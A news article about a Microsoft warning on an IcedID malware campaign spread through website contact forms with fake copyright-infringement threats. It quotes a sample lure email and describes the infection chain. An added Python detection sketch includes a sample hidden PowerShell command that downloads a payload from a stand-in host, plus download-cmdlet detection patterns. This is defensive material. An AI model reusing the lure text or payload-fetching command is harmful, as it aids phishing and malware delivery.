
Microsoft has a ‘warning’ on Google contact IDs

Microsoft has warned about a new malware campaign that infects computers through websites' contact forms using fake legal threats. The attackers use legitimate Google URLs to gain a foothold on the target's system: the URLs require the target to sign in with their Google credentials, after which the system is compromised.
According to Microsoft, attackers are abusing website contact forms to deliver malicious links. The resulting emails include a link that supposedly lets the target check the evidence behind the allegation. Clicking the link downloads a malware called IcedID, which can steal data from the computer and can also lead to the installation of ransomware. The attackers use Google URLs to make the target believe the link is safe to click.
The malicious emails
An example of such a malicious email is given below:
“Hello. This is Meleena and I am a qualified photographer and illustrator. I was surprised, mildly speaking, when I saw my images at your website. If you use a copyrighted image without an owner’s consent, you must be aware that you could be sued by the copyright owner if it is unlawful to use stolen images and it’s so cheap! Here is this document with the links to my images you used at (the website) and my earlier publications to get the evidence of my legal copyrights. Download it now and check this out for yourself.
(the malicious link)
If you don’t remove the images mentioned in the document above during the next few days. I’ll file a to your hosting provider informing them that my copyrights have been severely infringed and I am trying to protect my intellectual property And it doesn’t help trust me I am going to take it to court! And you won’t receive the second notice from me.”
Microsoft said in the blog post: “After the email recipient signs in, the sites.google.com page automatically downloads a malicious ZIP file, which contains a heavily obfuscated .js file. The malicious .js file is executed via WScript to create a shell object for launching PowerShell to download the IcedID payload (a .dat file), which is decrypted by a dropped DLL loader, as well as a Cobalt Strike beacon in the form of a stageless DLL, allowing attackers to remotely control the compromised device.”
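The chain Microsoft describes (a .js run by WScript, which launches PowerShell to fetch the payload) leaves a characteristic parent/child trail in process-creation telemetry. The following detection sketch is an added example, not Microsoft's code; the event records are constructed, Sysmon-style samples, and the path and cmdlet patterns are assumptions chosen for illustration.

```python
import re
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(temp|downloads|appdata)\\", re.I)   # assumed unpack locations
DOWNLOAD_VERBS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)

def basename(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def inspect_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons (if any) one process-creation event matches the chain."""
    image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    reasons: List[str] = []
    # Stage 1: WScript/CScript executing a .js that sits in a user-writable
    # location, as the .js unpacked from the downloaded ZIP would.
    if image in SCRIPT_HOSTS and re.search(r"\.js\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        reasons.append("script host ran .js from user-writable path")
    # Stage 2: PowerShell whose parent is the script host (WScript shell object
    # launch); a download cmdlet in its command line matches the payload fetch.
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        reasons.append("powershell spawned by script host")
        if DOWNLOAD_VERBS.search(cmd):
            reasons.append("download cmdlet in powershell command line")
    return reasons

def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Run inspect_event over every event; returns (event index, reason) hits."""
    return [(i, r) for i, ev in enumerate(events) for r in inspect_event(ev)]

# Constructed sample events (Sysmon-style field names); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\Downloads\evidence\document.js"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/p.dat','C:\Users\u\AppData\Local\Temp\p.dat')"},
    # Benign: domain logon script from NETLOGON, and an interactive PowerShell session.
    {"Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r'cscript.exe //B "\\dc01\netlogon\logon.js"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe -NoProfile"},
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

Only the two malicious events are flagged; the NETLOGON script and the interactive PowerShell session pass, which is the kind of false-positive check a rule like this needs before deployment.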
